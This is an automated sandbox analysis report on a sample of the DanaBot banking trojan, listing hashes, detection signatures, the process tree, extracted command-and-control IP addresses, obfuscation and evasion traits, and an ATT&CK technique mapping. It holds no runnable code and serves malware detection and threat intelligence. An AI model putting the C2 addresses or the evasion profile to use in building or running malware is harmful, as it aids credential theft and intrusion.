Windows Analysis Report Coy2GAiARw

Overview

General Information

Sample Name: Coy2GAiARw (renamed file extension from none to exe)
Analysis ID: 502747
MD5: 5ad64bb7be7914ad793ae5ccb98a571e
SHA1: 60aeca403754af25ff307050496a70eabe706a8a
SHA256: 18ae9ea1c1d71b33777c8772248580f17a2bcecf1aa0e8f71ec15d4b33d5253b
Tags: 32, DanaBot, exe, trojan

Detection

DanaBot
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected DanaBot stealer dll
Detected unpacking (overwrites its own PE header)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Machine Learning detection for sample
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to dynamically determine API calls
IP address seen in connection with other malware
Creates a DirectInput object (often for capturing keystrokes)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses Microsoft's Enhanced Cryptographic Provider

Classification

Process Tree

  • System is w10x64
  • Coy2GAiARw.exe (PID: 6816 cmdline: 'C:\Users\user\Desktop\Coy2GAiARw.exe' MD5: 5AD64BB7BE7914AD793AE5CCB98A571E)
    • rundll32.exe (PID: 6852 cmdline: C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\COY2GA~1.DLL,s C:\Users\user\Desktop\COY2GA~1.EXE MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
  • cleanup

Malware Configuration

Threatname: DanaBot

{"C2 list": ["192.210.222.88:443", "192.236.147.159:443", "192.119.110.73:443"], "Embedded Hash": "F4711E27D559B4AEB1A081A1EB0AC465"}

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\Desktop\COY2GA~1.EXE.dll | JoeSecurity_DanaBot_stealer_dll_1 | Yara detected DanaBot stealer dll | Joe Security |

Memory Dumps

Source | Rule | Description | Author | Strings
00000000.00000003.315558430.000000007FD50000.00000004.00000001.sdmp | JoeSecurity_DanaBot_stealer_dll_1 | Yara detected DanaBot stealer dll | Joe Security |

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      AV Detection:

      Found malware configuration
      Source: 00000000.00000003.315558430.000000007FD50000.00000004.00000001.sdmp, Malware Configuration Extractor: DanaBot {"C2 list": ["192.210.222.88:443", "192.236.147.159:443", "192.119.110.73:443"], "Embedded Hash": "F4711E27D559B4AEB1A081A1EB0AC465"}
      Multi AV Scanner detection for submitted file
      Source: Coy2GAiARw.exe, Virustotal: Detection: 42%
      Yara detected DanaBot stealer dll
      Source: Yara match, File source: 00000000.00000003.315558430.000000007FD50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: C:\Users\user\Desktop\COY2GA~1.EXE.dll, type: DROPPED
      Machine Learning detection for sample
      Source: Coy2GAiARw.exe, Joe Sandbox ML: detected
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F5C80 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_004F5C80
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F0FBC CryptAcquireContextA,CryptImportKey,CryptAcquireContextA,CryptDecrypt,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_004F0FBC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F29AC CryptDestroyKey,0_2_004F29AC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F6334 CryptReleaseContext,0_2_004F6334
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F2C93 CryptReleaseContext,0_2_004F2C93
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F2D48 CryptDestroyKey,0_2_004F2D48
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F2F04 CryptReleaseContext,0_2_004F2F04
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0086120C CryptAcquireContextA,CryptImportKey,CryptAcquireContextA,CryptDecrypt,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_0086120C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00865ED0 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,0_2_00865ED0

      Compliance:

      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\Coy2GAiARw.exe, Unpacked PE file: 0.2.Coy2GAiARw.exe.400000.0.unpack
      Source: Coy2GAiARw.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: Binary string: 9C:\sil-dafunotepon bolinebihaw98\gekib.pdb`0P source: Coy2GAiARw.exe
      Source: Binary string: C:\sil-dafunotepon bolinebihaw98\gekib.pdb source: Coy2GAiARw.exe
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00409568 FindFirstFileW,FindClose,0_2_00409568
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00414924 FindFirstFileW,FindClose,0_2_00414924
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00408F9C GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_00408F9C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_007791EC GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_007791EC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_007797B8 FindFirstFileW,FindClose,0_2_007797B8

      Networking:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 192.119.110.73 443
      C2 URLs / IPs found in malware configuration
      Source: Malware configuration extractor, URLs: 192.210.222.88:443
      Source: Malware configuration extractor, URLs: 192.236.147.159:443
      Source: Malware configuration extractor, URLs: 192.119.110.73:443
      Source: Joe Sandbox View, ASN Name: HOSTWINDSUS HOSTWINDSUS
      Source: Joe Sandbox View, IP Address: 192.119.110.73 192.119.110.73
      Source: unknown, Network traffic detected: HTTP traffic on port 443 -> 49742
      Source: unknown, Network traffic detected: HTTP traffic on port 49742 -> 443
      Source: Coy2GAiARw.exe, 00000000.00000002.316475191.00000000008CA000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      Yara detected DanaBot stealer dll
      Source: Yara match, File source: 00000000.00000003.315558430.000000007FD50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: C:\Users\user\Desktop\COY2GA~1.EXE.dll, type: DROPPED
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F0FBC CryptAcquireContextA,CryptImportKey,CryptAcquireContextA,CryptDecrypt,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_004F0FBC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0086120C CryptAcquireContextA,CryptImportKey,CryptAcquireContextA,CryptDecrypt,CryptImportKey,CryptDecrypt,CryptDestroyKey,CryptReleaseContext,0_2_0086120C
      Source: Coy2GAiARw.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F0FBC0_2_004F0FBC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0086120C0_2_0086120C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: String function: 00406CF4 appears 50 times
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: String function: 00776F44 appears 46 times
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: String function: 0040BE8C appears 41 times
      Source: Coy2GAiARw.exe, 00000000.00000003.315793591.0000000002658000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamekernel32j% vs Coy2GAiARw.exe
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_CURSOR type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: Coy2GAiARw.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: Coy2GAiARw.exeVirustotal: Detection: 42%
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Coy2GAiARw.exe 'C:\Users\user\Desktop\Coy2GAiARw.exe'
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\COY2GA~1.DLL,s C:\Users\user\Desktop\COY2GA~1.EXE
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\COY2GA~1.DLL,s C:\Users\user\Desktop\COY2GA~1.EXEJump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeFile created: C:\Users\user\Desktop\COY2GA~1.EXE.dllJump to behavior
      Source: classification engineClassification label: mal96.troj.evad.winEXE@3/1@0/1
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00414A38 GetDiskFreeSpaceW,0_2_00414A38
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\system32\rundll32.exe C:\Users\user\Desktop\COY2GA~1.DLL,s C:\Users\user\Desktop\COY2GA~1.EXE
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
      Source: Coy2GAiARw.exeStatic file information: File size 1159680 > 1048576
      Source: Coy2GAiARw.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: 9C:\sil-dafunotepon bolinebihaw98\gekib.pdb`0P source: Coy2GAiARw.exe
      Source: Binary string: C:\sil-dafunotepon bolinebihaw98\gekib.pdb source: Coy2GAiARw.exe

      Data Obfuscation:

      Detected unpacking (overwrites its own PE header)
      Source: C:\Users\user\Desktop\Coy2GAiARw.exe, Unpacked PE file: 0.2.Coy2GAiARw.exe.400000.0.unpack
      Detected unpacking (changes PE section rights)
      Source: C:\Users\user\Desktop\Coy2GAiARw.exe, Unpacked PE file: 0.2.Coy2GAiARw.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.nusavu:ER;.pudipuv:ER;.rsrc:R; vs .text:ER;.itext:ER;.data:W;.bss:W;.idata:W;.didata:W;.edata:R;.tls:W;.rdata:R;.reloc:R;.rsrc:R;
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004FC000 push 004FC0DEh; ret 0_2_004FC0D6
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004FC474 push 004FC511h; ret 0_2_004FC509
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0040B108 push 0040B18Bh; ret 0_2_0040B183
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00416B84 push 00416C1Dh; ret 0_2_00416C15
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004F9C24 push 004F9CD6h; ret 0_2_004F9CCE
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00411524 push 0041155Ch; ret 0_2_00411554
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004146CC push ecx; mov dword ptr [esp], ecx0_2_004146D0
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0086C0C4 push 004FC511h; ret 0_2_0086C159
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0078491C push ecx; mov dword ptr [esp], ecx0_2_00784920
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0077B358 push 0040B18Bh; ret 0_2_0077B3D3
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0086BC50 push 004FC0DEh; ret 0_2_0086BD26
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00786DD4 push 00416C1Dh; ret 0_2_00786E65
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00869E74 push 004F9CD6h; ret 0_2_00869F1E
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00781774 push 0041155Ch; ret 0_2_007817A4
      Source: Coy2GAiARw.exeStatic PE information: section name: .nusavu
      Source: Coy2GAiARw.exeStatic PE information: section name: .pudipuv
      Source: COY2GA~1.EXE.dll.0.drStatic PE information: section name: .didata
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004EE96C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,0_2_004EE96C
      Source: initial sampleStatic PE information: section name: .text entropy: 7.99111772368
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeFile created: C:\Users\user\Desktop\COY2GA~1.EXE.dllJump to dropped file
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004EE96C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,0_2_004EE96C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\SysWOW64\rundll32.exeWindow / User API: threadDelayed 2053Jump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0040AFF4 GetSystemInfo,0_2_0040AFF4
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00409568 FindFirstFileW,FindClose,0_2_00409568
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00414924 FindFirstFileW,FindClose,0_2_00414924
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00408F9C GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_00408F9C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_007791EC GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,0_2_007791EC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_007797B8 FindFirstFileW,FindClose,0_2_007797B8
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004EE96C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryW,GetProcAddress,GetProcAddress,0_2_004EE96C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0077092B mov eax, dword ptr fs:[00000030h]0_2_0077092B
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00770D90 mov eax, dword ptr fs:[00000030h]0_2_00770D90

      HIPS / PFW / Operating System Protection Evasion:

      System process connects to network (likely due to code injection or exploit)
      Source: C:\Windows\SysWOW64\rundll32.exe, Network Connect: 192.119.110.73 443
      Source: rundll32.exe, 00000004.00000002.822019573.0000000003370000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: rundll32.exe, 00000004.00000002.822019573.0000000003370000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: rundll32.exe, 00000004.00000002.822019573.0000000003370000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: rundll32.exe, 00000004.00000002.822019573.0000000003370000.00000002.00020000.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,0_2_004096A0
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: GetLocaleInfoW,0_2_00416278
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: GetLocaleInfoW,0_2_0041622C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00408B40
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: GetLocaleInfoW,0_2_00419540
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: EnumSystemLocalesW,0_2_0041977C
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: GetUserDefaultUILanguage,GetLocaleInfoW,0_2_007798F0
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: EnumSystemLocalesW,0_2_007899CC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: GetLocaleInfoW,0_2_007864C8
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00778D74
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00778D90
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_00404C04 cpuid 0_2_00404C04
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_004161DC GetLocalTime,0_2_004161DC
      Source: C:\Users\user\Desktop\Coy2GAiARw.exeCode function: 0_2_0040B008 GetVersion,0_2_0040B008

      Stealing of Sensitive Information:

      Yara detected DanaBot stealer dll
      Source: Yara match, File source: 00000000.00000003.315558430.000000007FD50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: C:\Users\user\Desktop\COY2GA~1.EXE.dll, type: DROPPED

      Remote Access Functionality:

      Yara detected DanaBot stealer dll
      Source: Yara match, File source: 00000000.00000003.315558430.000000007FD50000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match, File source: C:\Users\user\Desktop\COY2GA~1.EXE.dll, type: DROPPED

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Native API 1 | Application Shimming 1 | Process Injection 12 | Masquerading 1 | Input Capture 1 | System Time Discovery 1 | Remote Services | Input Capture 1 | Exfiltration Over Other Network Medium | Encrypted Channel 22 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Data Encrypted for Impact 1
      Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Application Shimming 1 | Process Injection 12 | LSASS Memory | Process Discovery 1 | Remote Desktop Protocol | Archive Collected Data 11 | Exfiltration Over Bluetooth | Application Layer Protocol 11 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information 1 | Security Account Manager | Application Window Discovery 1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Steganography | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Obfuscated Files or Information 3 | NTDS | File and Directory Discovery 1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Rundll32 1 | LSA Secrets | System Information Discovery 26 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Software Packing 22 | Cached Domain Credentials | System Owner/User Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      Coy2GAiARw.exe | 42% | Virustotal |
      Coy2GAiARw.exe | 100% | Joe Sandbox ML |

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      Source | Detection | Scanner | Label
      0.3.Coy2GAiARw.exe.9c0000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen

      Domains

      No Antivirus matches

      URLs

      Source | Detection | Scanner | Label
      192.210.222.88:443 | 0% | Avira URL Cloud | safe
      192.119.110.73:443 | 0% | Avira URL Cloud | safe
      192.236.147.159:443 | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

      No contacted domains info

      Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      192.210.222.88:443 | true | Avira URL Cloud: safe | unknown
      192.119.110.73:443 | true | Avira URL Cloud: safe | unknown
      192.236.147.159:443 | true | Avira URL Cloud: safe | unknown

      Contacted IPs

      Public

      IP | Domain | Country | ASN | ASN Name | Malicious
      192.119.110.73 | unknown | United States | 54290 | HOSTWINDSUS | true

      General Information

      Joe Sandbox Version: 33.0.0 White Diamond
      Analysis ID: 502747
      Start date: 14.10.2021
      Start time: 11:50:13
      Joe Sandbox Product: CloudBasic
      Overall analysis duration: 0h 8m 13s
      Hypervisor based Inspection enabled: false
      Report type: full
      Sample file name: Coy2GAiARw (renamed file extension from none to exe)
      Cookbook file name: default.jbs
      Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
      Number of analysed new started processes analysed: 22
      Number of new started drivers analysed: 0
      Number of existing processes analysed: 0
      Number of existing drivers analysed: 0
      Number of injected processes analysed: 0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode: default
      Analysis stop reason: Timeout
      Detection: MAL
      Classification: mal96.troj.evad.winEXE@3/1@0/1
      EGA Information: Failed
      HDC Information:
      • Successful, ratio: 21.5% (good quality ratio 20.4%)
      • Quality average: 78.1%
      • Quality standard deviation: 26.1%
      HCA Information: Failed
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Override analysis time to 240s for sample files taking high CPU consumption
      Warnings:
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
      • Excluded IPs from analysis (whitelisted): 20.82.210.154, 52.251.79.25, 20.54.110.249, 40.112.88.60, 13.107.4.50, 20.199.120.182, 23.52.67.112, 23.52.67.98, 95.100.216.89, 104.94.90.32, 104.127.115.201, 20.199.120.85
      • Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, b1ns.c-0001.c-msedge.net, a1449.dscg2.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, e15275.g.akamaiedge.net, arc.msn.com, cdn.onenote.net.edgekey.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, wildcard.weather.microsoft.com.edgekey.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, cdn.onenote.net, b1ns.au-msedge.net, client.wns.windows.com, fs.microsoft.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, wu-shim.trafficmanager.net, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, asf-ris-prod-neu.northeurope.cloudapp.azure.com, tile-service.weather.microsoft.com, ctldl.windowsupdate.com, c-0001.c-msedge.net, e1723.g.akamaiedge.net, ris.api.iris.microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, e1553.dspg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
      • Not all processes were analyzed, report is missing behavior information

      Simulations

      Behavior and APIs

      Time | Type | Description
      11:51:22 | API Interceptor | 1x Sleep call for process: rundll32.exe modified

      Joe Sandbox View / Context

      IPs

                                              Domains

                                              No context

                                              ASN

                                              JA3 Fingerprints

                                              No context

                                              Dropped Files

                                              No context

                                              Created / dropped Files

                                              C:\Users\user\Desktop\COY2GA~1.EXE.dll
                                              Process:C:\Users\user\Desktop\Coy2GAiARw.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):1407488
                                              Entropy (8bit):6.678243409594869
                                              Encrypted:false
                                              SSDEEP:24576:z8pWEmCxRJvbip/sVJ5u5+JAMh9sweYgoGZH4vQWTIZMb77Qz:YfNJAMh9ynh4vQWTkn
